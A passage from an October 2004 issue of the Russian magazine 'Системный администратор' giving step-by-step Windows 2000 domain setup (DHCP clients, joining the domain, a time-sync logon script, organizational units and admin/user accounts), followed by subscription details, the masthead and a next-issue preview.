Подразумевается, что на всех клиентах установлены опе-
рационные системы Windows 2000 и выше.
№10(23), октябрь 2004
образование
На каждом клиенте регистрируемся с правами локаль-
ного администратора, заходим в свойства сетевого окру-
жения, выбираем свойства сетевого подключения по ло-
кальной сети и редактируем свойства «Протокола Интер-
нета (TCP/IP)». Задаем всем клиентам «Получить IP-адрес
автоматически» и «Получить адрес DNS-сервера автома-
тически». После этого перезагружаем каждого клиента.
Можно обновить параметры, и не прибегая к перезагруз-
ке, – написав в командной строке:
ipconfig /renew
DHCP-сервер автоматически выдаст каждому клиенту IP-
адрес из заданного вами диапазона, а также присвоит ад-
реса шлюза по умолчанию и DNS-сервера.
Если по каким-либо причинам вы не используете DHCP-
сервер или хотите присвоить одному из клиентов (напри-
мер, другому серверу, входящему в домен) IP-адрес вруч-
ную, задайте IP-адрес из нашего диапазона, а также шлюз
по умолчанию, и обязательно(!) адрес DNS-сервера (в на-
шем примере его адрес – 192.168.0.1).
После перезагрузки вводим клиентов в домен. Для
Windows 2000/XP: правой клавишей по Мой компьютер →
Свойства → Сетевая идентификация → Свойства. Прове-
ряем имя компьютера. Оно обязательно должно быть на-
писано латинскими буквами, без пробелов и спецсимволов,
запрещенных к применению в именах клиентов. Если это
не так, то переименовываем и перезагружаем компьютер.
Затем ставим галочку «Является членом домена» и зада-
ем имя нашего домена: firma.local. Система потребует вве-
сти имя и пароль пользователя, имеющего право на введе-
ние компьютеров в домен. Вводим «Администратор» и наш
пароль. Через некоторое время вы увидите приглашение в
домен и предложение перезагрузить компьютер.
Если этого не произошло – проверьте, воткнут ли сете-
вой кабель в сервер, в клиентский компьютер, и включены
ли они оба. Также необходимо проверить корректность на-
стройки протокола TCP/IP. В командной строке даем коман-
ду: ipconfig /all и смотрим результат. Среди выданной ин-
формации находим нужную нам – об IP-адресе, маске, шлю-
зе и DNS-сервере. Она должна быть примерно такой:
IP-адрес . . . . . . . . . . : 192.168.0.11
Маска подсети . . . . . . . . . . : 255.255.255.0
Основной шлюз . . . . . . . . . . : 192.168.0.254
DNS-серверы . . . . . . . . . . : 192.168.0.1
Если в поле IP-адрес стоит что-то типа: 169.254.xxx.xxx –
ваш клиент не смог получить от DHCP-сервера IP-адрес.
Проверяйте работоспособность DHCP-сервера и физичес-
кой сети (проводов). Если же все нормально, то проверяем
настройку DNS-сервера, как описано выше, в разделе DNS-
сервер. Если проблемы есть, первым делом проверьте, не
остановлены ли на сервере службы DHCP и DNS (некото-
рые любят «улучшать параметры», удаляя или останавли-
вая неизвестные им службы). После введения клиента в
домен и перезагрузки в окне входа выбираем «Дополни-
тельно» и меняем <Имя компьютера> (этот компьютер) на
название нашего домена (FIRMA). После чего вводим имя
пользователя и пароль и входим в систему. Пользователей
необходимо завести на контроллере домена.
93
 образование
Настройка домена,
заведение пользователей
Первым делом переводим контроллер домена в основной ре-
жим (NATIVE-MODE). Убедитесь, что в вашем домене отсут-
ствуют другие контроллеры домена под управлением
Windows NT 4 Server. Затем открываем Пуск → Программы →
Администрирование → Active Directory → Пользователи и
компьютеры. Если меню «Администрирование» в «Програм-
мах» нет, то можно найти его в «Панели управления» или
щелкнув правой клавишей по панели задач – Свойства →
Дополнительно → Отображать меню «Администрирование».
В оснастке Active Directory → Пользователи и компью-
теры правой клавишей кликаем по нашему домену и выби-
раем «Свойства». Пункт Общие → Режим работы домена.
У нас установлен «Смешанный режим». Нажимаем «Сме-
нить режим» и соглашаемся с предупреждением о необра-
тимости операции.
Теперь настроим синхронизацию времени с контролле-
ром домена на клиентах с операционными системами ниже,
чем Windows 2000. Создадим на системном диске папку,
например, Apps. В ней создаем текстовый файл с расши-
рением *.bat. Обратите внимание, чтобы у файла не было
двойного расширения, так как стандартная команда «Со-
здать – Текстовый файл» создает именно *.txt-файл, а по
умолчанию Windows скрывает расширения. Исправляем
это: в «проводнике» – Сервис → Свойства папки → Вид –
снимаем галочку «Скрывать расширения для зарегистри-
рованных типов файлов».
Создаем в нашей папке Apps текстовый файл logon.bat,
открываем его и вводим в него следующие команды:
@echo off
net time \\server /set /yes
где вместо «server» вставляем имя созданного нами сер-
вера, если назвали его иначе. Сохраняем файл.
Затем снова открываем консоль Active Directory →
Пользователи и компьютеры и вызываем свойства нашего
домена, как при переводе в основной режим. Открываем
закладку «Групповая политика» и нажимаем «Изменить».
Откроется консоль «Групповая политика». Конфигурация
пользователя → Конфигурация Windows → Сценарии (вход
и выход). Дважды щелкаем на Вход в систему → Доба-
вить → Обзор. Выделяем в маске выбираемых файлов «Все
файлы» и проводником находим наш файл «logon.bat». Вы-
бираем его и нажимаем дважды «ОК». Закрываем окно
«Групповая политика» и в открытом нами окне «Свойства»
нажимаем «Применить», затем «ОК».
Клиенты домена с ОС Windows 2000 и выше – автома-
тически синхронизируют время с контроллерами домена.
В открытой консоли «Active Directory → Пользователи и
компьютеры» раскрываем значком «+» наш домен. Затем
правой клавишей по корню домена (firma.local) – Создать
→ Подразделение. Вводим имя нового подразделения, на-
пример All_Users. В него мы будем помещать всех пользо-
вателей нашего домена и другие вложенные подразделе-
ния. Это необходимо для дальнейшего создания и редак-
тирования групповых политик, при помощи которых можно
автоматически присваивать необходимые параметры и на-
стройки компьютерам и пользователям домена.
94
Теперь щелкаем правой клавишей по созданному нами
подразделению All_Users и снова выбираем Создать → Под-
разделение. Вводим имя подразделения администраторов
домена, например, Admins. Затем щелкаем по подразделе-
нию Admins правой клавишей – Свойства. Переходим на зак-
ладку «Групповая политика». Выставляем галку Блокировать
наследование политики → Применить → ОК. Это необходи-
мо сделать для того, чтобы заданные для всех ограничения
не распространялись на администраторов домена. Иначе
можно с удивлением обнаружить, что вы с полномочиями
администратора домена также не имеете прав на измене-
ние каких-либо настроек.
Теперь заведем полноценного администратора домена,
на которого не будут распространяться общие групповые
политики. Снова щелкаем правой клавишей по Admins →
Создать → Пользователь. Вводим имя и фамилию, а также
имя для входа в систему (logon name). Щелкаем «Далее»,
вводим и подтверждаем пароль этого пользователя. Жмем
Далее → Готово. Созданный нами пользователь появится в
правой части консоли при открытии подразделения Admins.
Щелкаем по нему правой клавишей и выбираем «Свойства».
Закладка Член групп → Добавить. Добавляем все группы
администраторов. Несмотря на то что группа «Администра-
торы» уже включает в себя подгруппы «Администраторы
домена» и «Администраторы предприятия», лучше продуб-
лировать их для предотвращения возможных ошибок исклю-
чения из групп. Жмем «ОК» и в появившемся списке выде-
ляем «Администраторы предприятия». Щелкаем по кнопке
«Задать основную группу». Затем выделяем группу «Пользо-
ватели домена» и жмем «Удалить». Подтверждаем свой вы-
бор. Выходим из окна «Свойства», нажав «ОК».
Закрываем оснастку Active Directory → Пользователи и
компьютеры. Мы создали домен и первого пользователя в
нем. Эту учетную запись вы будете использовать для ад-
министрирования домена. Внимание! Помните, что рабо-
тать повседневно под учетной записью, имеющей полно-
мочия «Администратора домена» крайне неразумно! Она
должна использоваться только для произведения измене-
ний в домене. Для запуска приложений от имени другой
учетной записи необязательно завершать текущий сеанс.
Удерживая клавишу <Shift>, щелкните по ярлыку вашего
приложения правой клавишей мыши. Выбрав «Запуск от
имени…», введите необходимые учетные данные. Прило-
жение запустится с привилегиями этой учетной записи.
Очень удобно применять, например, для изменения инфор-
мации при помощи файловых менеджеров. Не забудьте
закрыть приложение после произведения всех необходи-
мых действий.
Теперь создадим нашу первую пользовательскую учет-
ную запись. Выделяем подразделение All_Users, правой
клавишей – Создать → Пользователь. По описанной ана-
логии создаем для себя пользователя, под которым вы бу-
дете работать повседневно. При этом не добавляем
пользователю членств в группах – он автоматически бу-
дет включен в группу «Пользователи домена». Все! Даль-
нейшее заведение пользователей аналогично описанно-
му примеру.
В следующем номере мы рассмотрим пример настрой-
ки сервера приложений (сервер терминалов).

Российская Федерация
! Подписной индекс: 81655
Каталог агентства «Роспечать»
! Подписной индекс: 87836
Объединенный каталог «Пресса России»
Адресный каталог «Подписка за рабочим столом»
Адресный каталог «Библиотечный каталог»
! Альтернативные подписные агентства:
Агентство «Интер-Почта» (095) 500-00-60, курьерская
доставка по Москве
Агентство «Вся Пресса» (095) 787-34-47
Агентство «Курьер-Прессервис»
! Подписка On-line
http://www.arzy.ru
http://www.gazety.ru
http://www.presscafe.ru
СНГ
В странах СНГ подписка принимается в почтовых отделе-
ниях по национальным каталогам или по списку номенкла-
туры АРЗИ:
! Казахстан – по каталогу «Российская Пресса» через
ОАО «Казпочта» и ЗАО «Евразия пресс»
! Беларусь – по каталогу изданий стран СНГ через РГО
«Белпочта» (220050, г.Минск, пр-т Ф.Скорины, 10)
подписка на I полугодие 2005
! Узбекистан – по каталогу «Davriy nashrlar» российские
издания через агентство по распространению печати
«Davriy nashrlar» (7000029, Ташкент, пл.Мустакиллик,
5/3, офис 33)
! Азербайджан – по объединенному каталогу российских
изданий через предприятие по распространению печа-
ти «Гасид» (370102, г. Баку, ул. Джавадхана, 21)
! Армения – по списку номенклатуры «АРЗИ» через ГЗАО
«Армпечать» (375005, г.Ереван, пл.Сасунци Давида, д.2)
и ЗАО «Контакт-Мамул» (375002, г. Ереван, ул.Сарья-
на, 22)
! Грузия – по списку номенклатуры «АРЗИ» через АО
«Сакпресса» ( 380019, г.Тбилиси, ул.Хошараульская, 29)
и АО «Мацне» (380060, г.Тбилиси, пр-т Гамсахурдия, 42)
! Молдавия – по каталогу через ГП «Пошта Молдавей»
(МД-2012, г.Кишинев, бул.Штефан чел Маре, 134)
по списку через ГУП «Почта Приднестровья» (МD-3300,
г.Тирасполь, ул.Ленина, 17)
по прайслисту через ООО Агентство «Editil Periodice»
(2012, г.Кишинев, бул. Штефан чел Маре, 134)
! Подписка для Украины:
Киевский главпочтамп
Подписное агентство «KSS»
Телефон/факс (044)464-0220

Подписные
индексы:

81655
по каталогу
агентства
«Роспечать»

87836
по каталогу
агентства
«Пресса
России»

№10(23), октябрь 2004 95

СИСТЕМНЫЙ АДМИНИСТРАТОР
№10(23), Октябрь, 2004 год
РЕДАКЦИЯ
Исполнительный директор
Владимир Положевец
Ответственный секретарь
Наталья Хвостова
sekretar@samag.ru
Технический редактор
Владимир Лукин
Редактор
Андрей Бешков
РЕКЛАМНАЯ СЛУЖБА
тел./факс: (095) 928-8253
Константин Меделян
reсlama@samag.ru
Верстка и оформление
imposer@samag.ru
maker_up@samag.ru
Дизайн обложки
Николай Петрочук
103045, г. Москва,
Ананьевский переулок, дом 4/2 стр. 1
тел./факс: (095) 928-8253
Е-mail: info@samag.ru
Internet: www.samag.ru
РУКОВОДИТЕЛЬ ПРОЕКТА
Петр Положевец
УЧРЕДИТЕЛИ
Владимир Положевец
Александр Михалев
ИЗДАТЕЛЬ
ЗАО «Издательский дом
«Учительская газета»
Отпечатано типографией
ГП «Московская Типография №13»
Тираж 7000 экз.
Журнал зарегистрирован
в Министерстве РФ по делам печати,
телерадиовещания и средств мас-
совых коммуникаций (свидетельство
ПИ № 77-12542 от 24 апреля 2002г.)
За содержание статьи ответствен-
ность несет автор. За содержание
рекламного обьявления ответствен-
ность несет рекламодатель. Все пра-
ва на опубликованные материалы за-
щищены. Редакция оставляет за со-
бой право изменять содержание сле-
дующих номеров.
96
ЧИТАЙТЕ
В СЛЕДУЮЩЕМ
НОМЕРЕ:
Заметки о Linare Пакетный фильтр
«Заметки о Linare» открывают цикл OpenBSD
статей, посвященных настольным ди- В статье пойдет речь о возможностях
стрибутивам Linux. Вопрос об исполь- и особенностях настройки пакетного
зовании Linux на клиентских местах об- фильтра Packet Filter (PF), входящего
суждается сейчас очень широко – со- в стандартный дистрибутив системы
здается такое впечатление, что каждое OpenBSD, начиная с версии 3.0.
уважающее себя аналитическое агент-
ство считает своим долгом подготовить Создание сценария
исследование, дающее исчерпываю- регистрации пользователей
щий ответ на вопрос, когда Windows в сети
окончательно сдаст свои позиции, В предыдущих статьях я рассказывал о
сколько это будет стоить и случится ли том, как автоматизировать различные
вообще. Не отстают и гиганты индуст- процессы в сети. Решение поставлен-
рии: «тяжеловесы» вроде Novell и Sun ной задачи нетривиально и состоит из
Microsystems выпускают собственные нескольких частей. Одной из них явля-
разработки с обязательной приставкой ется сценарий регистрации пользовате-
«Desktop». Мы же, в свою очередь, по- лей в сети. По своему характеру она
пробуем рассмотреть этот феномен с носила концептуальный характер, одна-
позиций конечного пользователя. Чем ко на форуме журнала читатели дали
настольный Linux отличается от своих понять, что концепция – это хорошо, но
«ненастольных» аналогов? Как ведет необходимо привести конкретный при-
себя в работе тот или иной дистрибу- мер. Пришла пора сложить недостаю-
тив, можно ли использовать его для щие кусочки мозаики в одно целое и
решения определенного кргуа задач? подробно рассказать о теоретических
Вот те вопросы, на которые мы попы- и практических аспектах его создания
таемся дать ответ. и особенностях внедрения.
Вы можете приобретать журналы в магазинах
и торговых точках г. Москвы по адресам:
! Магазин «Компьютерная и деловая книга» (Ленинский проспект, строение 38).
! Выставочный компьютерный центр «Савеловский» (Киоск у главного входа).
! Выставочный компьютерный центр «Буденовский».
! Книжная ярмарка «Центральная». Mагазин «Деловая и учебная литерату-
ра» (м. Тульская, Варшавское шоссе, д.9. эт. 5, павильон 515-09).
! ТЦ «Электроника на Пресне». Mагазин «Техкнига» (павильон 8-9).
! Редакция «Учительская газета» (Ананьевский переулок, д. 4/2, стр. 1).
On-line магазины:
! www.allsoft.ru Уважаемые читатели!
! www.linuxcenter.ru
! www.linuxshop.ru НЕ ПРОПУСТИТЕ ПОДПИСКУ
! www.bolero.ru на первое полугодие 2005 года
подробная информация на стр. 95